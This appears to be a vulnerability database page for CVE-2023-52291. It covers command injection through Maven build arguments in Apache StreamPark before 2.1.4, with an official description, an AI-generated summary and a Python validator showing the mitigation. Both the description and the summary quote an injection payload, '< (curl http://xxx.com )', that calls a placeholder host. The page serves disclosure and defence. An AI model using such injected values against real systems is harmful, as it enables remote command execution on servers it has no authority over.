VYPR
Moderate severity · NVD Advisory · Published Jul 17, 2024 · Updated Feb 13, 2025

Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution

CVE-2023-52291

Description

In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution. The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.

Background:

In the "Project" module, the "<" operator in the Maven build args causes command injection, e.g. "< (curl http://xxx.com )" will be executed as a command injection.

Mitigation:

All users should upgrade to 2.1.4. The "<" operator will be blocked.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

In Apache StreamPark before 2.1.4, the Maven build args input in the Project module lacks strict validation, allowing authenticated users with system-level permissions to inject commands via the '<' operator, leading to remote command execution.

Vulnerability

Overview

CVE-2023-52291 is a low-severity command injection vulnerability found in Apache StreamPark (incubating) versions 2.0.0 through 2.1.3. The flaw resides in the Project module, which integrates Maven's compilation capabilities. The input parameter for Maven build arguments is not rigorously validated, allowing an attacker to inject arbitrary operating system commands by using the '<' operator. For example, a malicious build arg like < (curl http://xxx.com) would be executed as a command injection [1][3].

Attack

Requirements and Exploitation

Exploitation of this vulnerability requires the attacker to be an authenticated user with system-level permissions within the StreamPark application. The attacker must have the ability to create or modify a project's Maven build configuration. The '<' character is typically used in shell command substitution contexts, and the application passes user-supplied build arguments to a shell without proper sanitization. This allows the attacker to break out of the intended command and execute arbitrary OS commands [1][3].

Impact

If successfully exploited, an authenticated attacker with sufficient privileges can achieve remote command execution on the server hosting StreamPark. This could lead to full compromise of the application and underlying system, including data exfiltration, lateral movement, or disruption of streaming processing workloads. However, the official advisory rates the risk as very low because it requires both authentication and elevated permissions, and typical users are unlikely to input dangerous commands manually [1][2].

Mitigation

The vulnerability is fixed in Apache StreamPark version 2.1.4, released in July 2024. The fix specifically blocks the '<' operator in Maven build arguments. Users running versions 2.0.0 through 2.1.3 should upgrade to 2.1.4 or later. No workarounds other than upgrading are documented [1][3].
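As an added example (not StreamPark's own code), a Python validator that applies the mitigation described above and goes one step beyond it: it refuses "<" together with the other operators a shell would interpret, then hands the surviving tokens to mvn as an argv list instead of a shell string, so user input is never re-parsed by a shell. The function names and the project path are assumptions.

```python
import shlex
import subprocess

# Characters a POSIX shell would interpret as redirection, pipes, process or
# command substitution, chaining or grouping. StreamPark 2.1.4 blocks "<";
# this hypothetical validator rejects the whole set (assumption, not project code).
SHELL_METACHARS = set("<>|&;$`()\n")


def validate_maven_build_args(build_args: str) -> list[str]:
    """Return the build args as an argv list, or raise ValueError.

    Hypothetical helper. Any shell operator is refused outright, so the
    advisory's "< (curl http://xxx.com )" never reaches a shell.
    """
    bad = sorted({c for c in build_args if c in SHELL_METACHARS})
    if bad:
        raise ValueError(f"shell metacharacters not allowed in build args: {bad}")
    tokens = shlex.split(build_args)
    for tok in tokens:
        # Accept Maven flags (-DskipTests, -Pprod, --batch-mode) and goals
        # (clean, package, spring-boot:run); anything else is suspicious.
        is_flag = tok.startswith("-")
        is_goal = tok.replace(":", "").replace("-", "").isalnum()
        if not (is_flag or is_goal):
            raise ValueError(f"unexpected build arg token: {tok!r}")
    return tokens


def is_blocked(build_args: str) -> bool:
    """True if the validator rejects the string (used by the checks below)."""
    try:
        validate_maven_build_args(build_args)
    except ValueError:
        return True
    return False


def build_maven_command(build_args: str, pom_path: str) -> list[str]:
    """Assemble the argv list; each element reaches mvn as one literal argument."""
    return ["mvn", "-f", pom_path, "--batch-mode", *validate_maven_build_args(build_args)]


def run_maven(build_args: str, pom_path: str) -> int:
    """Run the build without shell=True, so no shell ever sees the user input."""
    argv = build_maven_command(build_args, pom_path)
    return subprocess.run(argv, check=False).returncode
```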

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                                  | Affected versions | Patched versions
org.apache.streampark:streampark (Maven) | < 2.1.4           | 2.1.4
